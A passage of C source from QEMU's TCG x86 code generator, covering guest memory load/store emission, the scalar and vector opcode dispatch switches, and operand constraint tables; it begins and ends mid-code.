tcg_out_st(s, TCG_TYPE_I32, l->datahi_reg, TCG_REG_ESP, ofs); ofs += 4; } tcg_out_sti(s, TCG_TYPE_I32, oi, TCG_REG_ESP, ofs); ofs += 4; retaddr = TCG_REG_EAX; tcg_out_movi(s, TCG_TYPE_PTR, retaddr, (uintptr_t)l->raddr); tcg_out_st(s, TCG_TYPE_PTR, retaddr, TCG_REG_ESP, ofs); } else { tcg_out_mov(s, TCG_TYPE_PTR, tcg_target_call_iarg_regs[0], TCG_AREG0); /* The second argument is already loaded with addrlo. */ tcg_out_mov(s, (s_bits == MO_64 ? TCG_TYPE_I64 : TCG_TYPE_I32), tcg_target_call_iarg_regs[2], l->datalo_reg); tcg_out_movi(s, TCG_TYPE_I32, tcg_target_call_iarg_regs[3], oi); if (ARRAY_SIZE(tcg_target_call_iarg_regs) > 4) { retaddr = tcg_target_call_iarg_regs[4]; tcg_out_movi(s, TCG_TYPE_PTR, retaddr, (uintptr_t)l->raddr); } else { retaddr = TCG_REG_RAX; tcg_out_movi(s, TCG_TYPE_PTR, retaddr, (uintptr_t)l->raddr); tcg_out_st(s, TCG_TYPE_PTR, retaddr, TCG_REG_ESP, TCG_TARGET_CALL_STACK_OFFSET); } } /* "Tail call" to the helper, with the return address back inline. */ tcg_out_push(s, retaddr); tcg_out_jmp(s, qemu_st_helpers[opc & (MO_BSWAP | MO_SIZE)]); return true; } static void tcg_out_qemu_ld_direct(TCGContext *s, TCGReg datalo, TCGReg datahi, TCGReg base, int index, intptr_t ofs, int seg, bool is64, MemOp memop) { const MemOp real_bswap = memop & MO_BSWAP; MemOp bswap = real_bswap; int rexw = is64 * P_REXW; int movop = OPC_MOVL_GvEv; if (have_movbe && real_bswap) { bswap = 0; movop = OPC_MOVBE_GyMy; } switch (memop & MO_SSIZE) { case MO_UB: tcg_out_modrm_sib_offset(s, OPC_MOVZBL + seg, datalo, base, index, 0, ofs); break; case MO_SB: tcg_out_modrm_sib_offset(s, OPC_MOVSBL + rexw + seg, datalo, base, index, 0, ofs); break; case MO_UW: tcg_out_modrm_sib_offset(s, OPC_MOVZWL + seg, datalo, base, index, 0, ofs); if (real_bswap) { tcg_out_rolw_8(s, datalo); } break; case MO_SW: if (real_bswap) { if (have_movbe) { tcg_out_modrm_sib_offset(s, OPC_MOVBE_GyMy + P_DATA16 + seg, datalo, base, index, 0, ofs); } else { tcg_out_modrm_sib_offset(s, OPC_MOVZWL + seg, datalo, base, index, 0, ofs); tcg_out_rolw_8(s, datalo); } tcg_out_modrm(s, OPC_MOVSWL + rexw, datalo, datalo); } else { tcg_out_modrm_sib_offset(s, OPC_MOVSWL + rexw + seg, datalo, base, index, 0, ofs); } break; case MO_UL: tcg_out_modrm_sib_offset(s, movop + seg, datalo, base, index, 0, ofs); if (bswap) { tcg_out_bswap32(s, datalo); } break; #if TCG_TARGET_REG_BITS == 64 case MO_SL: if (real_bswap) { tcg_out_modrm_sib_offset(s, movop + seg, datalo, base, index, 0, ofs); if (bswap) { tcg_out_bswap32(s, datalo); } tcg_out_ext32s(s, datalo, datalo); } else { tcg_out_modrm_sib_offset(s, OPC_MOVSLQ + seg, datalo, base, index, 0, ofs); } break; #endif case MO_Q: if (TCG_TARGET_REG_BITS == 64) { tcg_out_modrm_sib_offset(s, movop + P_REXW + seg, datalo, base, index, 0, ofs); if (bswap) { tcg_out_bswap64(s, datalo); } } else { if (real_bswap) { int t = datalo; datalo = datahi; datahi = t; } if (base != datalo) { tcg_out_modrm_sib_offset(s, movop + seg, datalo, base, index, 0, ofs); tcg_out_modrm_sib_offset(s, movop + seg, datahi, base, index, 0, ofs + 4); } else { tcg_out_modrm_sib_offset(s, movop + seg, datahi, base, index, 0, ofs + 4); tcg_out_modrm_sib_offset(s, movop + seg, datalo, base, index, 0, ofs); } if (bswap) { tcg_out_bswap32(s, datalo); tcg_out_bswap32(s, datahi); } } break; default: tcg_abort(); } } /* XXX: qemu_ld and qemu_st could be modified to clobber only EDX and EAX. It will be useful once fixed registers globals are less common. */ static void tcg_out_qemu_ld(TCGContext *s, const TCGArg *args, bool is64) { TCGReg datalo, datahi, addrlo; TCGReg addrhi QEMU_UNUSED_VAR; TCGMemOpIdx oi; MemOp opc; int mem_index; tcg_insn_unit *label_ptr[2]; datalo = *args++; datahi = (TCG_TARGET_REG_BITS == 32 && is64 ? *args++ : 0); addrlo = *args++; addrhi = (TARGET_LONG_BITS > TCG_TARGET_REG_BITS ? *args++ : 0); oi = *args++; opc = get_memop(oi); mem_index = get_mmuidx(oi); tcg_out_tlb_load(s, addrlo, addrhi, mem_index, opc, label_ptr, offsetof(CPUTLBEntry, addr_read)); /* TLB Hit. */ tcg_out_qemu_ld_direct(s, datalo, datahi, TCG_REG_L1, -1, 0, 0, is64, opc); /* Record the current context of a load into ldst label */ add_qemu_ldst_label(s, true, is64, oi, datalo, datahi, addrlo, addrhi, s->code_ptr, label_ptr); } static void tcg_out_qemu_st_direct(TCGContext *s, TCGReg datalo, TCGReg datahi, TCGReg base, int index, intptr_t ofs, int seg, MemOp memop) { /* ??? Ideally we wouldn't need a scratch register. For user-only, we could perform the bswap twice to restore the original value instead of moving to the scratch. But as it is, the L constraint means that TCG_REG_L0 is definitely free here. */ const TCGReg scratch = TCG_REG_L0; const MemOp real_bswap = memop & MO_BSWAP; MemOp bswap = real_bswap; int movop = OPC_MOVL_EvGv; if (have_movbe && real_bswap) { bswap = 0; movop = OPC_MOVBE_MyGy; } switch (memop & MO_SIZE) { case MO_8: /* In 32-bit mode, 8-bit stores can only happen from [abcd]x. Use the scratch register if necessary. */ if (TCG_TARGET_REG_BITS == 32 && datalo >= 4) { tcg_out_mov(s, TCG_TYPE_I32, scratch, datalo); datalo = scratch; } tcg_out_modrm_sib_offset(s, OPC_MOVB_EvGv + P_REXB_R + seg, datalo, base, index, 0, ofs); break; case MO_16: if (bswap) { tcg_out_mov(s, TCG_TYPE_I32, scratch, datalo); tcg_out_rolw_8(s, scratch); datalo = scratch; } tcg_out_modrm_sib_offset(s, movop + P_DATA16 + seg, datalo, base, index, 0, ofs); break; case MO_32: if (bswap) { tcg_out_mov(s, TCG_TYPE_I32, scratch, datalo); tcg_out_bswap32(s, scratch); datalo = scratch; } tcg_out_modrm_sib_offset(s, movop + seg, datalo, base, index, 0, ofs); break; case MO_64: if (TCG_TARGET_REG_BITS == 64) { if (bswap) { tcg_out_mov(s, TCG_TYPE_I64, scratch, datalo); tcg_out_bswap64(s, scratch); datalo = scratch; } tcg_out_modrm_sib_offset(s, movop + P_REXW + seg, datalo, base, index, 0, ofs); } else if (bswap) { tcg_out_mov(s, TCG_TYPE_I32, scratch, datahi); tcg_out_bswap32(s, scratch); tcg_out_modrm_sib_offset(s, OPC_MOVL_EvGv + seg, scratch, base, index, 0, ofs); tcg_out_mov(s, TCG_TYPE_I32, scratch, datalo); tcg_out_bswap32(s, scratch); tcg_out_modrm_sib_offset(s, OPC_MOVL_EvGv + seg, scratch, base, index, 0, ofs + 4); } else { if (real_bswap) { int t = datalo; datalo = datahi; datahi = t; } tcg_out_modrm_sib_offset(s, movop + seg, datalo, base, index, 0, ofs); tcg_out_modrm_sib_offset(s, movop + seg, datahi, base, index, 0, ofs + 4); } break; default: tcg_abort(); } } static void tcg_out_qemu_st(TCGContext *s, const TCGArg *args, bool is64) { TCGReg datalo, datahi, addrlo; TCGReg addrhi QEMU_UNUSED_VAR; TCGMemOpIdx oi; MemOp opc; int mem_index; tcg_insn_unit *label_ptr[2]; datalo = *args++; datahi = (TCG_TARGET_REG_BITS == 32 && is64 ? *args++ : 0); addrlo = *args++; addrhi = (TARGET_LONG_BITS > TCG_TARGET_REG_BITS ? *args++ : 0); oi = *args++; opc = get_memop(oi); mem_index = get_mmuidx(oi); tcg_out_tlb_load(s, addrlo, addrhi, mem_index, opc, label_ptr, offsetof(CPUTLBEntry, addr_write)); /* TLB Hit. */ tcg_out_qemu_st_direct(s, datalo, datahi, TCG_REG_L1, -1, 0, 0, opc); /* Record the current context of a store into ldst label */ add_qemu_ldst_label(s, false, is64, oi, datalo, datahi, addrlo, addrhi, s->code_ptr, label_ptr); } static inline void tcg_out_op(TCGContext *s, TCGOpcode opc, const TCGArg *args, const int *const_args) { TCGArg a0, a1, a2; int c, const_a2, vexop, rexw = 0; #if TCG_TARGET_REG_BITS == 64 # define OP_32_64(x) \ case glue(glue(INDEX_op_, x), _i64): \ rexw = P_REXW; /* FALLTHRU */ \ case glue(glue(INDEX_op_, x), _i32) #else # define OP_32_64(x) \ case glue(glue(INDEX_op_, x), _i32) #endif /* Hoist the loads of the most common arguments. */ a0 = args[0]; a1 = args[1]; a2 = args[2]; const_a2 = const_args[2]; switch (opc) { case INDEX_op_exit_tb: /* Reuse the zeroing that exists for goto_ptr. */ if (a0 == 0) { tcg_out_jmp(s, s->code_gen_epilogue); } else { tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_EAX, a0); tcg_out_jmp(s, s->tb_ret_addr); } break; case INDEX_op_goto_tb: if (s->tb_jmp_insn_offset) { /* direct jump method */ int gap; /* jump displacement must be aligned for atomic patching; * see if we need to add extra nops before jump */ gap = tcg_pcrel_diff(s, (void *)(QEMU_ALIGN_PTR_UP(s->code_ptr + 1, 4))); if (gap != 1) { tcg_out_nopn(s, gap - 1); } tcg_out8(s, OPC_JMP_long); /* jmp im */ s->tb_jmp_insn_offset[a0] = tcg_current_code_size(s); tcg_out32(s, 0); } else { /* indirect jump method */ tcg_out_modrm_offset(s, OPC_GRP5, EXT5_JMPN_Ev, -1, (intptr_t)(s->tb_jmp_target_addr + a0)); } set_jmp_reset_offset(s, a0); break; case INDEX_op_goto_ptr: /* jmp to the given host address (could be epilogue) */ tcg_out_modrm(s, OPC_GRP5, EXT5_JMPN_Ev, a0); break; case INDEX_op_br: tcg_out_jxx(s, JCC_JMP, arg_label(a0), 0); break; OP_32_64(ld8u): /* Note that we can ignore REXW for the zero-extend to 64-bit. */ tcg_out_modrm_offset(s, OPC_MOVZBL, a0, a1, a2); break; OP_32_64(ld8s): tcg_out_modrm_offset(s, OPC_MOVSBL + rexw, a0, a1, a2); break; OP_32_64(ld16u): /* Note that we can ignore REXW for the zero-extend to 64-bit. */ tcg_out_modrm_offset(s, OPC_MOVZWL, a0, a1, a2); break; OP_32_64(ld16s): tcg_out_modrm_offset(s, OPC_MOVSWL + rexw, a0, a1, a2); break; #if TCG_TARGET_REG_BITS == 64 case INDEX_op_ld32u_i64: #endif case INDEX_op_ld_i32: tcg_out_ld(s, TCG_TYPE_I32, a0, a1, a2); break; OP_32_64(st8): if (const_args[0]) { tcg_out_modrm_offset(s, OPC_MOVB_EvIz, 0, a1, a2); tcg_out8(s, a0); } else { tcg_out_modrm_offset(s, OPC_MOVB_EvGv | P_REXB_R, a0, a1, a2); } break; OP_32_64(st16): if (const_args[0]) { tcg_out_modrm_offset(s, OPC_MOVL_EvIz | P_DATA16, 0, a1, a2); tcg_out16(s, a0); } else { tcg_out_modrm_offset(s, OPC_MOVL_EvGv | P_DATA16, a0, a1, a2); } break; #if TCG_TARGET_REG_BITS == 64 case INDEX_op_st32_i64: #endif case INDEX_op_st_i32: if (const_args[0]) { tcg_out_modrm_offset(s, OPC_MOVL_EvIz, 0, a1, a2); tcg_out32(s, a0); } else { tcg_out_st(s, TCG_TYPE_I32, a0, a1, a2); } break; OP_32_64(add): /* For 3-operand addition, use LEA. */ if (a0 != a1) { TCGArg c3 = 0; if (const_a2) { c3 = a2, a2 = -1; } else if (a0 == a2) { /* Watch out for dest = src + dest, since we've removed the matching constraint on the add. */ tgen_arithr(s, ARITH_ADD + rexw, a0, a1); break; } tcg_out_modrm_sib_offset(s, OPC_LEA + rexw, a0, a1, a2, 0, c3); break; } c = ARITH_ADD; goto gen_arith; OP_32_64(sub): c = ARITH_SUB; goto gen_arith; OP_32_64(and): c = ARITH_AND; goto gen_arith; OP_32_64(or): c = ARITH_OR; goto gen_arith; OP_32_64(xor): c = ARITH_XOR; goto gen_arith; gen_arith: if (const_a2) { tgen_arithi(s, c + rexw, a0, a2, 0); } else { tgen_arithr(s, c + rexw, a0, a2); } break; OP_32_64(andc): if (const_a2) { tcg_out_mov(s, rexw ? TCG_TYPE_I64 : TCG_TYPE_I32, a0, a1); tgen_arithi(s, ARITH_AND + rexw, a0, ~a2, 0); } else { tcg_out_vex_modrm(s, OPC_ANDN + rexw, a0, a2, a1); } break; OP_32_64(mul): if (const_a2) { int32_t val; val = a2; if (val == (int8_t)val) { tcg_out_modrm(s, OPC_IMUL_GvEvIb + rexw, a0, a0); tcg_out8(s, val); } else { tcg_out_modrm(s, OPC_IMUL_GvEvIz + rexw, a0, a0); tcg_out32(s, val); } } else { tcg_out_modrm(s, OPC_IMUL_GvEv + rexw, a0, a2); } break; OP_32_64(div2): tcg_out_modrm(s, OPC_GRP3_Ev + rexw, EXT3_IDIV, args[4]); break; OP_32_64(divu2): tcg_out_modrm(s, OPC_GRP3_Ev + rexw, EXT3_DIV, args[4]); break; OP_32_64(shl): /* For small constant 3-operand shift, use LEA. */ if (const_a2 && a0 != a1 && (a2 - 1) < 3) { if (a2 - 1 == 0) { /* shl $1,a1,a0 -> lea (a1,a1),a0 */ tcg_out_modrm_sib_offset(s, OPC_LEA + rexw, a0, a1, a1, 0, 0); } else { /* shl $n,a1,a0 -> lea 0(,a1,n),a0 */ tcg_out_modrm_sib_offset(s, OPC_LEA + rexw, a0, -1, a1, a2, 0); } break; } c = SHIFT_SHL; vexop = OPC_SHLX; goto gen_shift_maybe_vex; OP_32_64(shr): c = SHIFT_SHR; vexop = OPC_SHRX; goto gen_shift_maybe_vex; OP_32_64(sar): c = SHIFT_SAR; vexop = OPC_SARX; goto gen_shift_maybe_vex; OP_32_64(rotl): c = SHIFT_ROL; goto gen_shift; OP_32_64(rotr): c = SHIFT_ROR; goto gen_shift; gen_shift_maybe_vex: if (have_bmi2) { if (!const_a2) { tcg_out_vex_modrm(s, vexop + rexw, a0, a2, a1); break; } tcg_out_mov(s, rexw ? TCG_TYPE_I64 : TCG_TYPE_I32, a0, a1); } /* FALLTHRU */ gen_shift: if (const_a2) { tcg_out_shifti(s, c + rexw, a0, a2); } else { tcg_out_modrm(s, OPC_SHIFT_cl + rexw, c, a0); } break; OP_32_64(ctz): tcg_out_ctz(s, rexw, args[0], args[1], args[2], const_args[2]); break; OP_32_64(clz): tcg_out_clz(s, rexw, args[0], args[1], args[2], const_args[2]); break; OP_32_64(ctpop): tcg_out_modrm(s, OPC_POPCNT + rexw, a0, a1); break; case INDEX_op_brcond_i32: tcg_out_brcond32(s, a2, a0, a1, const_args[1], arg_label(args[3]), 0); break; case INDEX_op_setcond_i32: tcg_out_setcond32(s, args[3], a0, a1, a2, const_a2); break; case INDEX_op_movcond_i32: tcg_out_movcond32(s, args[5], a0, a1, a2, const_a2, args[3]); break; OP_32_64(bswap16): tcg_out_rolw_8(s, a0); break; OP_32_64(bswap32): tcg_out_bswap32(s, a0); break; OP_32_64(neg): tcg_out_modrm(s, OPC_GRP3_Ev + rexw, EXT3_NEG, a0); break; OP_32_64(not): tcg_out_modrm(s, OPC_GRP3_Ev + rexw, EXT3_NOT, a0); break; OP_32_64(ext8s): tcg_out_ext8s(s, a0, a1, rexw); break; OP_32_64(ext16s): tcg_out_ext16s(s, a0, a1, rexw); break; OP_32_64(ext8u): tcg_out_ext8u(s, a0, a1); break; OP_32_64(ext16u): tcg_out_ext16u(s, a0, a1); break; case INDEX_op_qemu_ld_i32: tcg_out_qemu_ld(s, args, 0); break; case INDEX_op_qemu_ld_i64: tcg_out_qemu_ld(s, args, 1); break; case INDEX_op_qemu_st_i32: tcg_out_qemu_st(s, args, 0); break; case INDEX_op_qemu_st_i64: tcg_out_qemu_st(s, args, 1); break; OP_32_64(mulu2): tcg_out_modrm(s, OPC_GRP3_Ev + rexw, EXT3_MUL, args[3]); break; OP_32_64(muls2): tcg_out_modrm(s, OPC_GRP3_Ev + rexw, EXT3_IMUL, args[3]); break; OP_32_64(add2): if (const_args[4]) { tgen_arithi(s, ARITH_ADD + rexw, a0, args[4], 1); } else { tgen_arithr(s, ARITH_ADD + rexw, a0, args[4]); } if (const_args[5]) { tgen_arithi(s, ARITH_ADC + rexw, a1, args[5], 1); } else { tgen_arithr(s, ARITH_ADC + rexw, a1, args[5]); } break; OP_32_64(sub2): if (const_args[4]) { tgen_arithi(s, ARITH_SUB + rexw, a0, args[4], 1); } else { tgen_arithr(s, ARITH_SUB + rexw, a0, args[4]); } if (const_args[5]) { tgen_arithi(s, ARITH_SBB + rexw, a1, args[5], 1); } else { tgen_arithr(s, ARITH_SBB + rexw, a1, args[5]); } break; #if TCG_TARGET_REG_BITS == 32 case INDEX_op_brcond2_i32: tcg_out_brcond2(s, args, const_args, 0); break; case INDEX_op_setcond2_i32: tcg_out_setcond2(s, args, const_args); break; #else /* TCG_TARGET_REG_BITS == 64 */ case INDEX_op_ld32s_i64: tcg_out_modrm_offset(s, OPC_MOVSLQ, a0, a1, a2); break; case INDEX_op_ld_i64: tcg_out_ld(s, TCG_TYPE_I64, a0, a1, a2); break; case INDEX_op_st_i64: if (const_args[0]) { tcg_out_modrm_offset(s, OPC_MOVL_EvIz | P_REXW, 0, a1, a2); tcg_out32(s, a0); } else { tcg_out_st(s, TCG_TYPE_I64, a0, a1, a2); } break; case INDEX_op_brcond_i64: tcg_out_brcond64(s, a2, a0, a1, const_args[1], arg_label(args[3]), 0); break; case INDEX_op_setcond_i64: tcg_out_setcond64(s, args[3], a0, a1, a2, const_a2); break; case INDEX_op_movcond_i64: tcg_out_movcond64(s, args[5], a0, a1, a2, const_a2, args[3]); break; case INDEX_op_bswap64_i64: tcg_out_bswap64(s, a0); break; case INDEX_op_extu_i32_i64: case INDEX_op_ext32u_i64: case INDEX_op_extrl_i64_i32: tcg_out_ext32u(s, a0, a1); break; case INDEX_op_ext_i32_i64: case INDEX_op_ext32s_i64: tcg_out_ext32s(s, a0, a1); break; case INDEX_op_extrh_i64_i32: tcg_out_shifti(s, SHIFT_SHR + P_REXW, a0, 32); break; #endif OP_32_64(deposit): if (args[3] == 0 && args[4] == 8) { /* load bits 0..7 */ tcg_out_modrm(s, OPC_MOVB_EvGv | P_REXB_R | P_REXB_RM, a2, a0); } else if (args[3] == 8 && args[4] == 8) { /* load bits 8..15 */ tcg_out_modrm(s, OPC_MOVB_EvGv, a2, a0 + 4); } else if (args[3] == 0 && args[4] == 16) { /* load bits 0..15 */ tcg_out_modrm(s, OPC_MOVL_EvGv | P_DATA16, a2, a0); } else { tcg_abort(); } break; case INDEX_op_extract_i64: if (a2 + args[3] == 32) { /* This is a 32-bit zero-extending right shift. */ tcg_out_mov(s, TCG_TYPE_I32, a0, a1); tcg_out_shifti(s, SHIFT_SHR, a0, a2); break; } /* FALLTHRU */ case INDEX_op_extract_i32: /* On the off-chance that we can use the high-byte registers. Otherwise we emit the same ext16 + shift pattern that we would have gotten from the normal tcg-op.c expansion. */ tcg_debug_assert(a2 == 8 && args[3] == 8); if (a1 < 4 && a0 < 8) { tcg_out_modrm(s, OPC_MOVZBL, a0, a1 + 4); } else { tcg_out_ext16u(s, a0, a1); tcg_out_shifti(s, SHIFT_SHR, a0, 8); } break; case INDEX_op_sextract_i32: /* We don't implement sextract_i64, as we cannot sign-extend to 64-bits without using the REX prefix that explicitly excludes access to the high-byte registers. */ tcg_debug_assert(a2 == 8 && args[3] == 8); if (a1 < 4 && a0 < 8) { tcg_out_modrm(s, OPC_MOVSBL, a0, a1 + 4); } else { tcg_out_ext16s(s, a0, a1, 0); tcg_out_shifti(s, SHIFT_SAR, a0, 8); } break; OP_32_64(extract2): /* Note that SHRD outputs to the r/m operand. */ tcg_out_modrm(s, OPC_SHRD_Ib + rexw, a2, a0); tcg_out8(s, args[3]); break; case INDEX_op_mb: tcg_out_mb(s, a0); break; case INDEX_op_mov_i32: /* Always emitted via tcg_out_mov. */ case INDEX_op_mov_i64: case INDEX_op_movi_i32: /* Always emitted via tcg_out_movi. */ case INDEX_op_movi_i64: case INDEX_op_call: /* Always emitted via tcg_out_call. */ default: tcg_abort(); } #undef OP_32_64 } static void tcg_out_vec_op(TCGContext *s, TCGOpcode opc, unsigned vecl, unsigned vece, const TCGArg *args, const int *const_args) { static int const add_insn[4] = { OPC_PADDB, OPC_PADDW, OPC_PADDD, OPC_PADDQ }; static int const ssadd_insn[4] = { OPC_PADDSB, OPC_PADDSW, OPC_UD2, OPC_UD2 }; static int const usadd_insn[4] = { OPC_PADDUB, OPC_PADDUW, OPC_UD2, OPC_UD2 }; static int const sub_insn[4] = { OPC_PSUBB, OPC_PSUBW, OPC_PSUBD, OPC_PSUBQ }; static int const sssub_insn[4] = { OPC_PSUBSB, OPC_PSUBSW, OPC_UD2, OPC_UD2 }; static int const ussub_insn[4] = { OPC_PSUBUB, OPC_PSUBUW, OPC_UD2, OPC_UD2 }; static int const mul_insn[4] = { OPC_UD2, OPC_PMULLW, OPC_PMULLD, OPC_UD2 }; static int const shift_imm_insn[4] = { OPC_UD2, OPC_PSHIFTW_Ib, OPC_PSHIFTD_Ib, OPC_PSHIFTQ_Ib }; static int const cmpeq_insn[4] = { OPC_PCMPEQB, OPC_PCMPEQW, OPC_PCMPEQD, OPC_PCMPEQQ }; static int const cmpgt_insn[4] = { OPC_PCMPGTB, OPC_PCMPGTW, OPC_PCMPGTD, OPC_PCMPGTQ }; static int const punpckl_insn[4] = { OPC_PUNPCKLBW, OPC_PUNPCKLWD, OPC_PUNPCKLDQ, OPC_PUNPCKLQDQ }; static int const punpckh_insn[4] = { OPC_PUNPCKHBW, OPC_PUNPCKHWD, OPC_PUNPCKHDQ, OPC_PUNPCKHQDQ }; static int const packss_insn[4] = { OPC_PACKSSWB, OPC_PACKSSDW, OPC_UD2, OPC_UD2 }; static int const packus_insn[4] = { OPC_PACKUSWB, OPC_PACKUSDW, OPC_UD2, OPC_UD2 }; static int const smin_insn[4] = { OPC_PMINSB, OPC_PMINSW, OPC_PMINSD, OPC_UD2 }; static int const smax_insn[4] = { OPC_PMAXSB, OPC_PMAXSW, OPC_PMAXSD, OPC_UD2 }; static int const umin_insn[4] = { OPC_PMINUB, OPC_PMINUW, OPC_PMINUD, OPC_UD2 }; static int const umax_insn[4] = { OPC_PMAXUB, OPC_PMAXUW, OPC_PMAXUD, OPC_UD2 }; static int const shlv_insn[4] = { /* TODO: AVX512 adds support for MO_16. */ OPC_UD2, OPC_UD2, OPC_VPSLLVD, OPC_VPSLLVQ }; static int const shrv_insn[4] = { /* TODO: AVX512 adds support for MO_16. */ OPC_UD2, OPC_UD2, OPC_VPSRLVD, OPC_VPSRLVQ }; static int const sarv_insn[4] = { /* TODO: AVX512 adds support for MO_16, MO_64. */ OPC_UD2, OPC_UD2, OPC_VPSRAVD, OPC_UD2 }; static int const shls_insn[4] = { OPC_UD2, OPC_PSLLW, OPC_PSLLD, OPC_PSLLQ }; static int const shrs_insn[4] = { OPC_UD2, OPC_PSRLW, OPC_PSRLD, OPC_PSRLQ }; static int const sars_insn[4] = { OPC_UD2, OPC_PSRAW, OPC_PSRAD, OPC_UD2 }; static int const abs_insn[4] = { /* TODO: AVX512 adds support for MO_64. */ OPC_PABSB, OPC_PABSW, OPC_PABSD, OPC_UD2 }; TCGType type = vecl + TCG_TYPE_V64; int insn = 0, sub; TCGArg a0, a1, a2; a0 = args[0]; a1 = args[1]; a2 = args[2]; switch (opc) { case INDEX_op_add_vec: insn = add_insn[vece]; goto gen_simd; case INDEX_op_ssadd_vec: insn = ssadd_insn[vece]; goto gen_simd; case INDEX_op_usadd_vec: insn = usadd_insn[vece]; goto gen_simd; case INDEX_op_sub_vec: insn = sub_insn[vece]; goto gen_simd; case INDEX_op_sssub_vec: insn = sssub_insn[vece]; goto gen_simd; case INDEX_op_ussub_vec: insn = ussub_insn[vece]; goto gen_simd; case INDEX_op_mul_vec: insn = mul_insn[vece]; goto gen_simd; case INDEX_op_and_vec: insn = OPC_PAND; goto gen_simd; case INDEX_op_or_vec: insn = OPC_POR; goto gen_simd; case INDEX_op_xor_vec: insn = OPC_PXOR; goto gen_simd; case INDEX_op_smin_vec: insn = smin_insn[vece]; goto gen_simd; case INDEX_op_umin_vec: insn = umin_insn[vece]; goto gen_simd; case INDEX_op_smax_vec: insn = smax_insn[vece]; goto gen_simd; case INDEX_op_umax_vec: insn = umax_insn[vece]; goto gen_simd; case INDEX_op_shlv_vec: insn = shlv_insn[vece]; goto gen_simd; case INDEX_op_shrv_vec: insn = shrv_insn[vece]; goto gen_simd; case INDEX_op_sarv_vec: insn = sarv_insn[vece]; goto gen_simd; case INDEX_op_shls_vec: insn = shls_insn[vece]; goto gen_simd; case INDEX_op_shrs_vec: insn = shrs_insn[vece]; goto gen_simd; case INDEX_op_sars_vec: insn = sars_insn[vece]; goto gen_simd; case INDEX_op_x86_punpckl_vec: insn = punpckl_insn[vece]; goto gen_simd; case INDEX_op_x86_punpckh_vec: insn = punpckh_insn[vece]; goto gen_simd; case INDEX_op_x86_packss_vec: insn = packss_insn[vece]; goto gen_simd; case INDEX_op_x86_packus_vec: insn = packus_insn[vece]; goto gen_simd; #if TCG_TARGET_REG_BITS == 32 case INDEX_op_dup2_vec: /* First merge the two 32-bit inputs to a single 64-bit element. */ tcg_out_vex_modrm(s, OPC_PUNPCKLDQ, a0, a1, a2); /* Then replicate the 64-bit elements across the rest of the vector. */ if (type != TCG_TYPE_V64) { tcg_out_dup_vec(s, type, MO_64, a0, a0); } break; #endif case INDEX_op_abs_vec: insn = abs_insn[vece]; a2 = a1; a1 = 0; goto gen_simd; gen_simd: tcg_debug_assert(insn != OPC_UD2); if (type == TCG_TYPE_V256) { insn |= P_VEXL; } tcg_out_vex_modrm(s, insn, a0, a1, a2); break; case INDEX_op_cmp_vec: sub = args[3]; if (sub == TCG_COND_EQ) { insn = cmpeq_insn[vece]; } else if (sub == TCG_COND_GT) { insn = cmpgt_insn[vece]; } else { g_assert_not_reached(); } goto gen_simd; case INDEX_op_andc_vec: insn = OPC_PANDN; if (type == TCG_TYPE_V256) { insn |= P_VEXL; } tcg_out_vex_modrm(s, insn, a0, a2, a1); break; case INDEX_op_shli_vec: sub = 6; goto gen_shift; case INDEX_op_shri_vec: sub = 2; goto gen_shift; case INDEX_op_sari_vec: tcg_debug_assert(vece != MO_64); sub = 4; gen_shift: tcg_debug_assert(vece != MO_8); insn = shift_imm_insn[vece]; if (type == TCG_TYPE_V256) { insn |= P_VEXL; } tcg_out_vex_modrm(s, insn, sub, a0, a1); tcg_out8(s, a2); break; case INDEX_op_ld_vec: tcg_out_ld(s, type, a0, a1, a2); break; case INDEX_op_st_vec: tcg_out_st(s, type, a0, a1, a2); break; case INDEX_op_dupm_vec: tcg_out_dupm_vec(s, type, vece, a0, a1, a2); break; case INDEX_op_x86_shufps_vec: insn = OPC_SHUFPS; sub = args[3]; goto gen_simd_imm8; case INDEX_op_x86_blend_vec: if (vece == MO_16) { insn = OPC_PBLENDW; } else if (vece == MO_32) { insn = (have_avx2 ? OPC_VPBLENDD : OPC_BLENDPS); } else { g_assert_not_reached(); } sub = args[3]; goto gen_simd_imm8; case INDEX_op_x86_vperm2i128_vec: insn = OPC_VPERM2I128; sub = args[3]; goto gen_simd_imm8; gen_simd_imm8: if (type == TCG_TYPE_V256) { insn |= P_VEXL; } tcg_out_vex_modrm(s, insn, a0, a1, a2); tcg_out8(s, sub); break; case INDEX_op_x86_vpblendvb_vec: insn = OPC_VPBLENDVB; if (type == TCG_TYPE_V256) { insn |= P_VEXL; } tcg_out_vex_modrm(s, insn, a0, a1, a2); tcg_out8(s, args[3] << 4); break; case INDEX_op_x86_psrldq_vec: tcg_out_vex_modrm(s, OPC_GRP14, 3, a0, a1); tcg_out8(s, a2); break; case INDEX_op_mov_vec: /* Always emitted via tcg_out_mov. */ case INDEX_op_dupi_vec: /* Always emitted via tcg_out_movi. */ case INDEX_op_dup_vec: /* Always emitted via tcg_out_dup_vec. */ default: g_assert_not_reached(); } } static const TCGTargetOpDef *tcg_target_op_def(TCGOpcode op) { static const TCGTargetOpDef r = { .args_ct_str = { "r" } }; static const TCGTargetOpDef ri_r = { .args_ct_str = { "ri", "r" } }; static const TCGTargetOpDef re_r = { .args_ct_str = { "re", "r" } }; static const TCGTargetOpDef qi_r = { .args_ct_str = { "qi", "r" } }; static const TCGTargetOpDef r_r = { .args_ct_str = { "r", "r" } }; static const TCGTargetOpDef r_q = { .args_ct_str = { "r", "q" } }; static const TCGTargetOpDef r_re = { .args_ct_str = { "r", "re" } }; static const TCGTargetOpDef r_0 = { .args_ct_str = { "r", "0" } }; static const TCGTargetOpDef r_r_ri = { .args_ct_str = { "r", "r", "ri" } }; static const TCGTargetOpDef r_r_re = { .args_ct_str = { "r", "r", "re" } }; static const TCGTargetOpDef r_0_r = { .args_ct_str = { "r", "0", "r" } }; static const TCGTargetOpDef r_0_re = { .args_ct_str = { "r", "0", "re" } }; static const TCGTargetOpDef r_0_ci = { .args_ct_str = { "r", "0", "ci" } }; static const TCGTargetOpDef r_L = { .args_ct_str = { "r", "L" } }; static const TCGTargetOpDef L_L = { .args_ct_str = { "L", "L" } }; static const TCGTargetOpDef r_L_L = { .args_ct_str = { "r", "L", "L" } }; static const TCGTargetOpDef r_r_L = { .args_ct_str = { "r", "r", "L" } }; static const TCGTargetOpDef L_L_L = { .args_ct_str = { "L", "L", "L" } }; static const TCGTargetOpDef r_r_L_L = { .args_ct_str = { "r", "r", "L", "L" } }; static const TCGTargetOpDef L_L_L_L = { .args_ct_str = { "L", "L", "L", "L" } }; static const TCGTargetOpDef x_x = { .args_ct_str = { "x", "x" } }; static const TCGTargetOpDef x_x_x = { .args_ct_str = { "x", 